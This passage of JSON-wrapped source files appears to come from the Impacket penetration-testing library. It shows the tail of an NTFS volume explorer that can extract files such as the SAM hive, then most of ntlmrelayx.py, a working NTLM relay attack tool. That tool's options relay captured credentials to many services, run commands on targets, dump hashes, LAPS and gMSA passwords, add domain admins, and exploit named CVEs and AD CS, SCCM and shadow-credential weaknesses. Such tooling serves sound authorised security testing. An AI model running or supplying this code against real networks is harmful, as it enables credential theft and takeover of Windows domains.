mftRecord = NTFS_MFT_RECORD(record)\n\n record = newINode.PerformFixUp(mftRecord, record, self.RecordSize // self.SectorSize)\n if record is None:\n logging.error(\"FixUp failed for inode %d\" % iNodeNum)\n return newINode\n\n newINode.INodeNumber = iNodeNum\n newINode.AttributesRaw = record[mftRecord['AttributesOffset'] - recordLen:]\n newINode.parseAttributes()\n\n return newINode\n\nclass MiniShell(cmd.Cmd):\n def __init__(self, volume):\n cmd.Cmd.__init__(self)\n self.volumePath = volume\n self.volume = NTFS(volume)\n self.rootINode = self.volume.getINode(FILE_Root)\n self.prompt = '\\\\>'\n self.intro = 'Type help for list of commands'\n self.currentINode = self.rootINode\n self.completion = []\n self.pwd = '\\\\'\n self.do_ls('',False)\n self.last_output = ''\n\n def emptyline(self):\n pass\n\n def onecmd(self,s):\n retVal = False\n try:\n retVal = cmd.Cmd.onecmd(self,s)\n except Exception as e:\n logging.debug('Exception:', exc_info=True)\n logging.error(str(e))\n\n return retVal\n\n def do_exit(self,line):\n return True\n\n def do_shell(self, line):\n output = os.popen(line).read()\n print(output)\n self.last_output = output\n\n def do_help(self,line):\n print(\"\"\"\n cd {path} - changes the current directory to {path}\n pwd - shows current remote directory\n ls - lists all the files in the current directory\n lcd - change local directory\n get {filename} - downloads the filename from the current path\n cat {filename} - prints the contents of filename\n hexdump {filename} - hexdumps the contents of filename\n exit - terminates the server process (and this session)\n\n\"\"\")\n\n def do_lcd(self,line):\n if line == '':\n print(os.getcwd())\n else:\n os.chdir(line)\n print(os.getcwd())\n\n def do_cd(self, line):\n p = line.replace('/','\\\\')\n oldpwd = self.pwd\n newPath = ntpath.normpath(ntpath.join(self.pwd,p))\n if newPath == self.pwd:\n # Nothing changed\n return\n common = ntpath.commonprefix([newPath,oldpwd])\n\n if common == oldpwd:\n res = self.findPathName(ntpath.normpath(p))\n else:\n res = self.findPathName(newPath)\n\n if res is None:\n logging.error(\"Directory not found\")\n self.pwd = oldpwd\n return\n if res.isDirectory() == 0:\n logging.error(\"Not a directory!\")\n self.pwd = oldpwd\n return\n else:\n self.currentINode = res\n self.do_ls('', False)\n self.pwd = ntpath.join(self.pwd,p)\n self.pwd = ntpath.normpath(self.pwd)\n self.prompt = self.pwd + '>'\n\n def findPathName(self, pathName):\n if pathName == '\\\\':\n return self.rootINode\n tmpINode = self.currentINode\n parts = pathName.split('\\\\')\n for part in parts:\n if part == '':\n tmpINode = self.rootINode\n else:\n res = tmpINode.findFirst(part)\n if res is None:\n return res\n else:\n tmpINode = self.volume.getINode(res.getINodeNumber())\n\n return tmpINode\n\n def do_pwd(self,line):\n print(self.pwd)\n\n def do_ls(self, line, display=True):\n entries = self.currentINode.walk()\n if entries is None:\n entries = []\n logging.debug(\n \"ls summary for %s: total=%d index_root=%d index_allocation=%d\",\n self.pwd,\n len(entries),\n self.currentINode._walk_root_count,\n self.currentINode._walk_subnode_count,\n )\n self.completion = []\n for entry in entries:\n inode = INODE(self.volume)\n inode.FileAttributes = entry['FileAttributes']\n inode.FileSize = entry['DataSize']\n inode.LastDataChangeTime = datetime.fromtimestamp(getUnixTime(entry['LastDataChangeTime']))\n inode.FileName = entry['FileName'].decode('utf-16le')\n if display is True:\n inode.displayName()\n self.completion.append((inode.FileName,inode.isDirectory()))\n\n def complete_cd(self, text, line, begidx, endidx):\n return self.complete_get(text, line, begidx, endidx, include = 2)\n\n def complete_cat(self,text,line,begidx,endidx):\n return self.complete_get(text, line, begidx, endidx)\n\n def complete_hexdump(self,text,line,begidx,endidx):\n return self.complete_get(text, line, begidx, endidx)\n\n def complete_get(self, text, line, begidx, endidx, include = 1):\n # include means\n # 1 just files\n # 2 just directories\n items = []\n if include == 1:\n mask = 0\n else:\n mask = FILE_ATTR_I30_INDEX_PRESENT\n for i in self.completion:\n if i[1] == mask:\n items.append(i[0])\n if text:\n return [\n item for item in items\n if item.upper().startswith(text.upper())\n ]\n else:\n return items\n\n def do_hexdump(self,line):\n return self.do_cat(line,command = hexdump)\n\n def do_cat(self, line, command=None):\n if command is None:\n command = getattr(sys.stdout, 'buffer', sys.stdout).write\n pathName = line.replace('/', '\\\\')\n pathName = ntpath.normpath(ntpath.join(self.pwd, pathName))\n res = self.findPathName(pathName)\n if res is None:\n logging.error(\"Not found!\")\n return\n if res.isDirectory() > 0:\n logging.error(\"It's a directory!\")\n return\n if res.isCompressed() or res.isEncrypted():\n logging.error('Cannot handle compressed/encrypted files! :(')\n return\n\n stream = res.getStream(None)\n if stream is None:\n logging.error(\"Cannot read file stream!\")\n return\n\n dataSize = stream.getDataSize()\n if dataSize == 0:\n logging.info(\"0 bytes read (empty file)\")\n return\n\n chunkSize = 4096 * 10\n offset = 0\n while offset < dataSize:\n toRead = min(chunkSize, dataSize - offset)\n buf = stream.read(offset, toRead)\n if not buf:\n break\n try:\n command(buf)\n except (BrokenPipeError, OSError):\n return\n offset += len(buf)\n\n logging.info(\"%d bytes read\" % offset)\n\n def do_get(self, line):\n pathName = line.replace('/','\\\\')\n pathName = ntpath.normpath(ntpath.join(self.pwd,pathName))\n fh = open(ntpath.basename(pathName),\"wb\")\n self.do_cat(line, command = fh.write)\n fh.close()\n\ndef main():\n print(version.BANNER)\n parser = argparse.ArgumentParser(add_help = True, description = \"NTFS explorer (read-only)\")\n parser.add_argument('volume', action='store', help='NTFS volume to open (e.g. \\\\\\\\.\\\\C: or /dev/disk1s1)')\n parser.add_argument('-extract', action='store', help='extracts pathname (e.g. \\\\windows\\\\system32\\\\config\\\\sam)')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n\n if len(sys.argv)==1:\n parser.print_help()\n sys.exit(1)\n options = parser.parse_args()\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n shell = MiniShell(options.volume)\n if options.extract is not None:\n shell.onecmd(\"get %s\"% options.extract)\n else:\n shell.cmdloop()\n\nif __name__ == '__main__':\n main()\n sys.exit(1)\n" }, { "path": "examples/ntlmrelayx.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# Generic NTLM Relay Module\n#\n# This module performs the SMB Relay attacks originally discovered\n# by cDc extended to many target protocols (SMB, MSSQL, LDAP, etc).\n# It receives a list of targets and for every connection received it\n# will choose the next target and try to relay the credentials. Also, if\n# specified, it will first try to authenticate against the client connecting\n# to us.\n#\n# It is implemented by invoking a SMB and HTTP Server, hooking to a few\n# functions and then using the specific protocol clients (e.g. SMB, LDAP).\n# It is supposed to be working on any LM Compatibility level. The only way\n# to stop this attack is to enforce on the server SPN checks and or signing.\n#\n# If the authentication against the targets succeeds, the client authentication\n# succeeds as well and a valid connection is set against the local smbserver.\n# It's up to the user to set up the local smbserver functionality. One option\n# is to set up shares with whatever files you want to so the victim thinks it's\n# connected to a valid SMB server. All that is done through the smb.conf file or\n# programmatically.\n#\n# Authors:\n# Alberto Solino (@agsolino)\n# Dirk-jan Mollema / Fox-IT (https://www.fox-it.com)\n# Sylvain Heiniger / Compass Security (https://www.compass-security.com)\n#\n\nimport argparse\nimport sys\nimport logging\nimport cmd\ntry:\n from urllib.request import ProxyHandler, build_opener, Request\nexcept ImportError:\n from urllib2 import ProxyHandler, build_opener, Request\nfrom urllib.parse import urlparse\n\nimport json\nfrom time import sleep\nfrom threading import Thread\n\nfrom impacket import version\nfrom impacket.examples import logger\nfrom impacket.examples.ntlmrelayx.servers import SMBRelayServer, HTTPRelayServer, WCFRelayServer, RAWRelayServer, RPCRelayServer, WinRMRelayServer, WinRMSRelayServer, MSSQLRelayServer, RDPRelayServer \nfrom impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig, parse_listening_ports\nfrom impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor, TargetsFileWatcher\nfrom impacket.examples.ntlmrelayx.servers.socksserver import SOCKS\n\nRELAY_SERVERS = []\n\nclass MiniShell(cmd.Cmd):\n def __init__(self, relayConfig, threads, api_address):\n cmd.Cmd.__init__(self)\n\n self.prompt = 'ntlmrelayx> '\n self.api_address = api_address\n self.tid = None\n self.relayConfig = relayConfig\n self.intro = 'Type help for list of commands'\n self.relayThreads = threads\n self.serversRunning = True\n\n @staticmethod\n def printTable(items, header):\n colLen = []\n for i, col in enumerate(header):\n rowMaxLen = max([len(row[i]) for row in items])\n colLen.append(max(rowMaxLen, len(col)))\n\n outputFormat = ' '.join(['{%d:%ds} ' % (num, width) for num, width in enumerate(colLen)])\n\n # Print header\n print(outputFormat.format(*header))\n print(' '.join(['-' * max(itemLen, 3) for itemLen in colLen]))\n\n # And now the rows\n for row in items:\n print(outputFormat.format(*row))\n\n def emptyline(self):\n pass\n\n def do_targets(self, line):\n for url in self.relayConfig.target.originalTargets:\n print(url.geturl())\n return\n\n def do_finished_attacks(self, line):\n for url in self.relayConfig.target.finishedAttacks:\n print (url.geturl())\n return\n\n def do_socks(self, line):\n '''Filter are available :\n type : socks \n filters : target, username, admin \n values : \n - target : IP or FQDN\n - username : domain/username\n - admin : true or false \n '''\n\n headers = [\"Protocol\", \"Target\", \"Username\", \"AdminStatus\", \"Port\", \"ID\"]\n url = \"http://{}/ntlmrelayx/api/v1.0/relays\".format(self.api_address)\n try:\n proxy_handler = ProxyHandler({})\n opener = build_opener(proxy_handler)\n response = Request(url)\n r = opener.open(response)\n result = r.read()\n items = json.loads(result)\n except Exception as e:\n logging.error(\"ERROR: %s\" % str(e))\n else:\n if len(items) > 0:\n if(\"=\" in line and len(line.replace('socks','').split('='))==2):\n _filter=line.replace('socks','').split('=')[0]\n _value=line.replace('socks','').split('=')[1]\n if(_filter=='target'):\n _filter=1\n elif(_filter=='username'):\n _filter=2\n elif(_filter=='admin'):\n _filter=3\n else:\n logging.info('Expect : target / username / admin = value')\n return\n _items=[]\n for i in items:\n if(_value.lower() in i[_filter].lower()):\n _items.append(i)\n if(len(_items)>0):\n self.printTable(_items,header=headers)\n else:\n logging.info('No relay matching filter available!')\n\n elif(\"=\" in line):\n logging.info('Expect target/username/admin = value')\n else:\n self.printTable(items, header=headers)\n else:\n logging.info('No Relays Available!')\n\n def do_startservers(self, line):\n if not self.serversRunning:\n start_servers(options, self.relayThreads)\n self.serversRunning = True\n logging.info('Relay servers started')\n else:\n logging.error('Relay servers are already running!')\n\n def do_stopservers(self, line):\n if self.serversRunning:\n stop_servers(self.relayThreads)\n self.serversRunning = False\n logging.info('Relay servers stopped')\n else:\n logging.error('Relay servers are already stopped!')\n\n def do_exit(self, line):\n print(\"Shutting down, please wait!\")\n return True\n\n def do_EOF(self, line):\n return self.do_exit(line)\n\ndef start_servers(options, threads):\n for server in RELAY_SERVERS:\n #Set up config\n c = NTLMRelayxConfig()\n c.setProtocolClients(PROTOCOL_CLIENTS)\n c.setRunSocks(options.socks, socksServer)\n c.setTargets(targetSystem)\n c.setExeFile(options.e)\n c.setCommand(options.c)\n c.setEnumLocalAdmins(options.enum_local_admins)\n c.setAddComputerSMB(options.add_computer)\n c.setDisableMulti(options.no_multirelay)\n c.setKeepRelaying(options.keep_relaying)\n c.setEncoding(codec)\n c.setMode(mode)\n c.setAttacks(PROTOCOL_ATTACKS)\n c.setLootdir(options.lootdir)\n c.setOutputFile(options.output_file)\n c.setdumpHashes(options.dump_hashes)\n c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access, options.dump_laps, options.dump_gmsa, options.dump_adcs, options.sid, options.add_dns_record)\n c.setRPCOptions(options.rpc_mode, options.rpc_use_smb, options.auth_smb, options.hashes_smb, options.rpc_smb_port, options.icpr_ca_name)\n c.setMSSQLOptions(options.query)\n c.setInteractive(options.interactive)\n c.setIMAPOptions(options.keyword, options.mailbox, options.all, options.imap_max)\n c.setIPv6(options.ipv6)\n c.setWpadOptions(options.wpad_host, options.wpad_auth_num)\n c.setSMB2Support(options.smb2support)\n c.setSMBChallenge(options.ntlmchallenge)\n c.setSMBRPCAttack(options.rpc_attack)\n c.setInterfaceIp(options.interface_ip)\n c.setExploitOptions(options.remove_mic, options.remove_target, options.remove_sign_seal)\n c.setWebDAVOptions(options.serve_image)\n c.setIsADCSAttack(options.adcs)\n c.setADCSOptions(options.template)\n c.setIsShadowCredentialsAttack(options.shadow_credentials)\n c.setShadowCredentialsOptions(options.shadow_target, options.pfx_password, options.export_type,\n options.cert_outfile_path)\n c.setIsSCCMPoliciesAttack(options.sccm_policies)\n c.setIsSCCMDPAttack(options.sccm_dp)\n c.setSCCMPoliciesOptions(options.sccm_policies_clientname, options.sccm_policies_sleep)\n c.setSCCMDPOptions(options.sccm_dp_extensions, options.sccm_dp_files)\n \n c.setAltName(options.altname)\n\n #If the redirect option is set, configure the HTTP server to redirect targets to SMB\n if server is HTTPRelayServer and options.r is not None:\n c.setMode('REDIRECT')\n c.setRedirectHost(options.r)\n\n #Use target randomization if configured and the server is not SMB\n if server is not SMBRelayServer and options.random:\n c.setRandomTargets(True)\n\n if server is HTTPRelayServer:\n c.setDomainAccount(options.machine_account, options.machine_hashes, options.domain)\n for port in options.http_port:\n c.setListeningPort(port)\n s = server(c)\n s.start()\n threads.add(s)\n sleep(0.1)\n continue\n\n elif server is SMBRelayServer:\n c.setListeningPort(options.smb_port)\n elif server is WCFRelayServer:\n c.setListeningPort(options.wcf_port)\n elif server is RAWRelayServer:\n c.setListeningPort(options.raw_port)\n elif server is RPCRelayServer:\n c.setListeningPort(options.rpc_port)\n elif server is MSSQLRelayServer:\n c.setListeningPort(options.mssql_port)\n if options.mssql_db:\n c.setMSSQLDb(options.mssql_db)\n elif server is RDPRelayServer:\n c.setListeningPort(options.rdp_port)\n\n s = server(c)\n s.start()\n threads.add(s)\n return c\n\ndef stop_servers(threads):\n todelete = []\n for thread in threads:\n if isinstance(thread, tuple(RELAY_SERVERS)):\n thread.server.shutdown()\n todelete.append(thread)\n # Now remove threads from the set\n for thread in todelete:\n threads.remove(thread)\n del thread\n\n# Process command-line arguments.\nif __name__ == '__main__':\n\n print(version.BANNER)\n #Parse arguments\n parser = argparse.ArgumentParser(add_help = False, description = \"For every connection received, this module will \"\n \"try to relay that connection to specified target(s) system or the original client\")\n parser._optionals.title = \"Main options\"\n\n #Main arguments\n parser.add_argument(\"-h\",\"--help\", action=\"help\", help='show this help message and exit')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n parser.add_argument('-t',\"--target\", action='store', metavar = 'TARGET', help=\"Target to relay the credentials to, \"\n \"can be an IP, hostname or URL like domain\\\\username@host:port (domain\\\\username and port \"\n \"are optional, and don't forget to escape the '\\\\'). If unspecified, it will relay back \"\n \"to the client')\")\n parser.add_argument('-tf', action='store', metavar = 'TARGETSFILE', help='File that contains targets by hostname or '\n 'full URL, one per line')\n parser.add_argument('-w', action='store_true', help='Watch the target file for changes and update target list '\n 'automatically (only valid with -tf)')\n parser.add_argument('-i','--interactive', action='store_true',help='Launch an smbclient, LDAP console or SQL shell instead'\n 'of executing a command after a successful relay. This console will listen locally on a '\n ' tcp port and can be reached with for example netcat.')\n\n # Interface address specification\n parser.add_argument('-ip','--interface-ip', action='store', metavar='INTERFACE_IP', help='IP address of interface to '\n 'bind relay servers (\"0.0.0.0\" or \"::\" if omitted)',default=argparse.SUPPRESS)\n\n serversoptions = parser.add_argument_group()\n serversoptions.add_argument('--no-smb-server', action='store_true', help='Disables the SMB server')\n serversoptions.add_argument('--no-http-server', action='store_true', help='Disables the HTTP server')\n serversoptions.add_argument('--no-wcf-server', action='store_true', help='Disables the WCF server')\n serversoptions.add_argument('--no-raw-server', action='store_true', help='Disables the RAW server')\n serversoptions.add_argument('--no-rpc-server', action='store_true', help='Disables the RPC server')\n serversoptions.add_argument('--no-winrm-server', action='store_true', help='Disables the WinRM server')\n serversoptions.add_argument('--no-mssql-server', action='store_true', help='Disables the MSSQL server')\n serversoptions.add_argument('--no-rdp-server', action='store_true', help='Disables the RDP server')\n \n parser.add_argument('--smb-port', type=int, help='Port to listen on smb server', default=445)\n parser.add_argument('--http-port', help='Port(s) to listen on HTTP server. Can specify multiple ports by separating them with `,`, and ranges with `-`. Ex: `80,8000-8010`', default=\"80\")\n parser.add_argument('--wcf-port', type=int, help='Port to listen on wcf server', default=9389) # ADWS\n parser.add_argument('--raw-port', type=int, help='Port to listen on raw server', default=6666)\n parser.add_argument('--rpc-port', type=int, help='Port to listen on rpc server', default=135)\n parser.add_argument('--mssql-port', type=int, help='Port to listen on mssql server', default=1433)\n parser.add_argument('--rdp-port', type=int, help='Port to listen on rdp server', default=3389)\n\n parser.add_argument('--no-multirelay', action=\"store_true\", required=False, help='If set, disable multi-host relay (SMB and HTTP servers)')\n parser.add_argument('--keep-relaying', action=\"store_true\", required=False, help='If set, keeps relaying to a target even after a successful connection on it')\n parser.add_argument('-ra','--random', action='store_true', help='Randomize target selection')\n parser.add_argument('-r', action='store', metavar = 'SMBSERVER', help='Redirect HTTP requests to a file:// path on SMBSERVER')\n parser.add_argument('-l','--lootdir', action='store', type=str, required=False, metavar = 'LOOTDIR',default='.', help='Loot '\n 'directory in which gathered loot such as SAM dumps will be stored (default: current directory).')\n parser.add_argument('-of','--output-file', action='store',help='base output filename for encrypted hashes. Suffixes '\n 'will be added for ntlm and ntlmv2')\n parser.add_argument('-dh','--dump-hashes', action='store_true', default=False, help='show encrypted hashes in the console')\n parser.add_argument('-codec', action='store', help='Sets encoding used (codec) from the target\\'s output (default '\n '\"%s\"). If errors are detected, run chcp.com at the target, '\n 'map the result with '\n 'https://docs.python.org/3/library/codecs.html#standard-encodings and then execute ntlmrelayx.py '\n 'again with -codec and the corresponding codec ' % sys.getdefaultencoding())\n parser.add_argument('-smb2support', action=\"store_true\", default=False, help='SMB2 Support')\n parser.add_argument('-ntlmchallenge', action=\"store\", default=None, help='Specifies the NTLM server challenge used by the '\n 'SMB Server (16 hex bytes long. eg: 1122334455667788)')\n parser.add_argument('-socks', action='store_true', default=False,\n help='Launch a SOCKS proxy for the connection relayed')\n parser.add_argument('-socks-address', default='127.0.0.1', help='SOCKS5 server address (also used for HTTP API)')\n parser.add_argument('-socks-port', default=1080, type=int, help='SOCKS5 server port')\n parser.add_argument('-http-api-port', default=9090, type=int, help='SOCKS5 HTTP API port')\n parser.add_argument('-wh','--wpad-host', action='store',help='Enable serving a WPAD file for Proxy Authentication attack, '\n 'setting the proxy host to the one supplied.')\n parser.add_argument('-wa','--wpad-auth-num', action='store', type=int, default=1, help='Prompt for authentication N times for clients without MS16-077 installed '\n 'before serving a WPAD file. (default=1)')\n parser.add_argument('-6','--ipv6', action='store_true',help='Listen on IPv6')\n parser.add_argument('--remove-mic', action='store_true',help='Remove MIC (exploit CVE-2019-1040)')\n parser.add_argument('--remove-sign-seal', action='store_true', help='Remove SIGN/SEAL-related NTLM negotiate flags (exploit CVE-2025-33073)')\n parser.add_argument('--serve-image', action='store',help='local path of the image that will we returned to clients')\n parser.add_argument('-c', action='store', type=str, required=False, metavar = 'COMMAND', help='Command to execute on '\n 'target system (for SMB and RPC). If not specified for SMB, hashes will be dumped (secretsdump.py must be'\n ' in the same directory). For RPC no output will be provided.')\n parser.add_argument('--mssql-db', action='store', required = False, help='Database for MSSQL relay')\n\n #SMB arguments\n smboptions = parser.add_argument_group(\"SMB client options\")\n\n smboptions.add_argument('-e', action='store', required=False, metavar = 'FILE', help='File to execute on the target system. '\n 'If not specified, hashes will be dumped (secretsdump.py must be in the same directory)')\n smboptions.add_argument('--enum-local-admins', action='store_true', required=False, help='If relayed user is not admin, attempt SAMR lookup to see who is (only works pre Win 10 Anniversary)')\n smboptions.add_argument('--rpc-attack', action='store', choices=[None, \"TSCH\", \"ICPR\"], required=False, default=None, help='Select the attack to perform over RPC over named pipes.')\n \n #RPC arguments\n rpcoptions = parser.add_argument_group(\"RPC client options\")\n rpcoptions.add_argument('-rpc-mode', choices=[\"TSCH\", \"ICPR\"], default=\"TSCH\", help='Protocol to attack')\n rpcoptions.add_argument('-rpc-use-smb', action='store_true', required=False, help='Relay DCE/RPC to SMB pipes')\n rpcoptions.add_argument('-auth-smb', action='store', required=False, default='', metavar='[domain/]username[:password]',\n help='Use this credential to authenticate to SMB (low-privilege account)')\n rpcoptions.add_argument('-hashes-smb', action='store', required=False, metavar=\"LMHASH:NTHASH\")\n rpcoptions.add_argument('-rpc-smb-port', type=int, choices=[139, 445], default=445, help='Destination port to connect to SMB')\n rpcoptions.add_argument('-icpr-ca-name', action='store', default=\"\", help='Name of the CA for ICPR attack')\n\n #MSSQL arguments\n mssqloptions = parser.add_argument_group(\"MSSQL client options\")\n mssqloptions.add_argument('-q','--query', action='append', required=False, metavar = 'QUERY', help='MSSQL query to execute'\n '(can specify multiple)')\n\n #HTTPS options\n httpoptions = parser.add_argument_group(\"HTTP options\")\n httpoptions.add_argument('-machine-account', action='store', required=False,\n help='Domain machine account to use when interacting with the domain to grab a session key for '\n 'signing, format is domain/machine_name')\n httpoptions.add_argument('-machine-hashes', action=\"store\", metavar=\"LMHASH:NTHASH\",\n help='Domain machine hashes, format is LMHASH:NTHASH')\n httpoptions.add_argument('-domain', action=\"store\", help='Domain FQDN or IP to connect using NETLOGON')\n httpoptions.add_argument('-remove-target', action='store_true', default=False,\n help='Try to remove the target in the challenge message (in case CVE-2019-1019 patch is not installed)')\n\n #LDAP options\n ldapoptions = parser.add_argument_group(\"LDAP client options\")\n ldapoptions.add_argument('--no-dump', action='store_false', required=False, help='Do not attempt to dump LDAP information')\n ldapoptions.add_argument('--no-da', action='store_false', required=False, help='Do not attempt to add a Domain Admin')\n ldapoptions.add_argument('--no-acl', action='store_false', required=False, help='Disable ACL attacks')\n ldapoptions.add_argument('--no-validate-privs', action='store_false', required=False, help='Do not attempt to enumerate privileges, assume permissions are granted to escalate a user via ACL attacks')\n ldapoptions.add_argument('--escalate-user', action='store', required=False, help='Escalate privileges of this user instead of creating a new one')\n ldapoptions.add_argument('--delegate-access', action='store_true', required=False, help='Delegate access on relayed computer account to the specified account')\n ldapoptions.add_argument('--sid', action='store_true', required=False, help='Use a SID to delegate access rather than an account name')\n ldapoptions.add_argument('--dump-laps', action='store_true', required=False, help='Attempt to dump any LAPS passwords readable by the user')\n ldapoptions.add_argument('--dump-gmsa', action='store_true', required=False, help='Attempt to dump any gMSA passwords readable by the user')\n ldapoptions.add_argument('--dump-adcs', action='store_true', required=False, help='Attempt to dump ADCS enrollment services and certificate templates info')\n ldapoptions.add_argument('--add-dns-record', nargs=2, action='store', metavar=('NAME', 'IPADDR'), required=False, help='Add the record to DNS via LDAP pointing to ')\n\n #Common options for SMB and LDAP\n commonoptions = parser.add_argument_group(\"Common options for SMB and LDAP\")\n commonoptions.add_argument('--add-computer', action='store', metavar=('COMPUTERNAME', 'PASSWORD'), required=False, nargs='*', help='Attempt to add a new computer account via SMB or LDAP, depending on the specified target. '\n 'This argument can be used either with the LDAP or the SMB service, as long as the target is a domain controller.')\n\n #IMAP options\n imapoptions = parser.add_argument_group(\"IMAP client options\")\n imapoptions.add_argument('-k','--keyword', action='store', metavar=\"KEYWORD\", required=False, default=\"password\", help='IMAP keyword to search for. '\n 'If not specified, will search for mails containing \"password\"')\n imapoptions.add_argument('-m','--mailbox', action='store', metavar=\"MAILBOX\", required=False, default=\"INBOX\", help='Mailbox name to dump. Default: INBOX')\n imapoptions.add_argument('-a','--all', action='store_true', required=False, help='Instead of searching for keywords, '\n 'dump all emails')\n imapoptions.add_argument('-im','--imap-max', action='store',type=int, required=False,default=0, help='Max number of emails to dump '\n '(0 = unlimited, default: no limit)')\n\n # AD CS options\n adcsoptions = parser.add_argument_group(\"AD CS attack options\")\n adcsoptions.add_argument('--adcs', action='store_true', required=False, help='Enable AD CS relay attack')\n adcsoptions.add_argument('--template', action='store', metavar=\"TEMPLATE\", required=False, help='AD CS template. Defaults to Machine or User whether relayed account name ends with `$`. Relaying a DC should require specifying `DomainController`')\n adcsoptions.add_argument('--altname', action='store', metavar=\"ALTNAME\", required=False, help='Subject Alternative Name to use when performing ESC1 or ESC6 attacks.')\n\n # Shadow Credentials attack options\n shadowcredentials = parser.add_argument_group(\"Shadow Credentials attack options\")\n shadowcredentials.add_argument('--shadow-credentials', action='store_true', required=False,\n help='Enable Shadow Credentials relay attack (msDS-KeyCredentialLink manipulation for PKINIT pre-authentication)')\n shadowcredentials.add_argument('--shadow-target', action='store', required=False, help='target account (user or computer$) to populate msDS-KeyCredentialLink from')\n shadowcredentials.add_argument('--pfx-password', action='store', required=False,\n help='password for the PFX stored self-signed certificate (will be random if not set, not needed when exporting to PEM)')\n shadowcredentials.add_argument('--export-type', action='store', required=False, choices=[\"PEM\", \"PFX\"], type=lambda choice: choice.upper(), default=\"PFX\",\n help='choose to export cert+private key in PEM or PFX (i.e. #PKCS12) (default: PFX))')\n shadowcredentials.add_argument('--cert-outfile-path', action='store', required=False, help='filename to store the generated self-signed PEM or PFX certificate and key')\n\n # SCCM policies options\n sccmpoliciesoptions = parser.add_argument_group(\"SCCM Policies attack options\")\n sccmpoliciesoptions.add_argument('--sccm-policies', action='store_true', required=False, help='Enable SCCM policies attack. Performs SCCM secret policies dump from a Management Point by registering a device. Works best when relaying a machine account. Expects as target \\'http:///ccm_system_windowsauth/request\\'')\n sccmpoliciesoptions.add_argument('--sccm-policies-clientname', action='store', required=False, help='The name of the client that will be registered in order to dump secret policies. Defaults to the relayed account\\'s name')\n sccmpoliciesoptions.add_argument('--sccm-policies-sleep', action='store', required=False, help='The number of seconds to sleep after the client registration before requesting secret policies')\n\n sccmdpoptions = parser.add_argument_group(\"SCCM Distribution Point attack options\")\n sccmdpoptions.add_argument('--sccm-dp', action='store_true', required=False, help='Enable SCCM Distribution Point attack. Perform package file dump from an SCCM Distribution Point. Expects as target \\'http:///sms_dp_smspkg$/Datalib\\'')\n sccmdpoptions.add_argument('--sccm-dp-extensions', action='store', required=False, help='A custom list of extensions to look for when downloading files from the SCCM Distribution Point. If not provided, defaults to .ps1,.bat,.xml,.txt,.pfx')\n sccmdpoptions.add_argument('--sccm-dp-files', action='store', required=False, help='The path to a file containing a list of specific URLs to download from the Distribution Point, instead of downloading by extensions. Providing this argument will skip file indexing')\n\n try:\n options = parser.parse_args()\n except Exception as e:\n logging.error(str(e))\n sys.exit(1)\n\n if options.rpc_use_smb and not options.auth_smb:\n logging.error(\"Set -auth-smb to relay DCE/RPC to SMB pipes\")\n sys.exit(1)\n \n # Ensuring the correct target is set when performing SCCM policies attack\n if options.sccm_policies is True and not options.target.rstrip('/').endswith(\"/ccm_system_windowsauth/request\"):\n logging.error(\"When performing SCCM policies attack, the Management Point authenticated device registration endpoint should be provided as target\")\n logging.error(f\"For instance: {urlparse(options.target).scheme}://{urlparse(options.target).netloc}/ccm_system_windowsauth/request\")\n sys.exit(1)\n\n # Ensuring the correct target is set when performing SCCM DP attack\n if options.sccm_dp is True and not options.target.rstrip('/').endswith(\"/sms_dp_smspkg$/Datalib\"):\n logging.error(\"When performing SCCM DP attack, the Distribution Point Datalib endpoint should be provided as target\")\n logging.error(f\"For instance: {urlparse(options.target).scheme}://{urlparse(options.target).netloc}/sms_dp_smspkg$/Datalib\")\n sys.exit(1)\n\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n # Let's register the protocol clients we have\n # ToDo: Do this better somehow\n from impacket.examples.ntlmrelayx.clients import PROTOCOL_CLIENTS\n from impacket.examples.ntlmrelayx.attacks import PROTOCOL_ATTACKS\n\n if options.add_dns_record:\n dns_name = options.add_dns_record[0].lower()\n if dns_name == 'wpad' or dns_name == '*':\n logging.warning('You are asking to add a `wpad` or a wildcard DNS name. This can cause disruption in larger networks (using multiple DNS subdomains) or if workstations already use a proxy config.')\n\n if options.codec is not None:\n codec = options.codec\n else:\n codec = sys.getdefaultencoding()\n\n if options.target is not None:\n logging.info(\"Running in relay mode to single host\")\n mode = 'RELAY'\n targetSystem = TargetsProcessor(singleTarget=options.target, protocolClients=PROTOCOL_CLIENTS, randomize=options.random)\n # Disabling multirelay feature (Single host + general candidate)\n if targetSystem.generalCandidates:\n options.no_multirelay = True\n else:\n if options.tf is not None:\n #Targetfile specified\n if (options.add_computer):\n logging.info(\"To add a machine account through SMB only the Domain Controller must be specified as target\")\n sys.exit(1)\n logging.info(\"Running in relay mode to hosts in targetfile\")\n targetSystem = TargetsProcessor(targetListFile=options.tf, protocolClients=PROTOCOL_CLIENTS, randomize=options.random)\n mode = 'RELAY'\n else:\n logging.info(\"Running in reflection mode\")\n targetSystem = None\n mode = 'REFLECTION'\n\n if not options.no_smb_server:\n RELAY_SERVERS.append(SMBRelayServer)\n\n if not options.no_http_server:\n RELAY_SERVERS.append(HTTPRelayServer)\n try:\n options.http_port = parse_listening_ports(options.http_port)\n except ValueError:\n logging.error(\"Incorrect specification of port range for HTTP server\")\n sys.exit(1)\n\n if options.r is not None:\n logging.info(\"Running HTTP server in redirect mode\")\n\n if not options.no_wcf_server:\n RELAY_SERVERS.append(WCFRelayServer)\n\n if not options.no_raw_server:\n RELAY_SERVERS.append(RAWRelayServer)\n \n if not options.no_winrm_server:\n RELAY_SERVERS.append(WinRMRelayServer)\n RELAY_SERVERS.append(WinRMSRelayServer)\n\n if not options.no_rpc_server:\n RELAY_SERVERS.append(RPCRelayServer)\n \n if not options.no_mssql_server:\n RELAY_SERVERS.append(MSSQLRelayServer)\n\n if not options.no_rdp_server:\n RELAY_SERVERS.append(RDPRelayServer)\n\n if targetSystem is not None and options.w:\n watchthread = 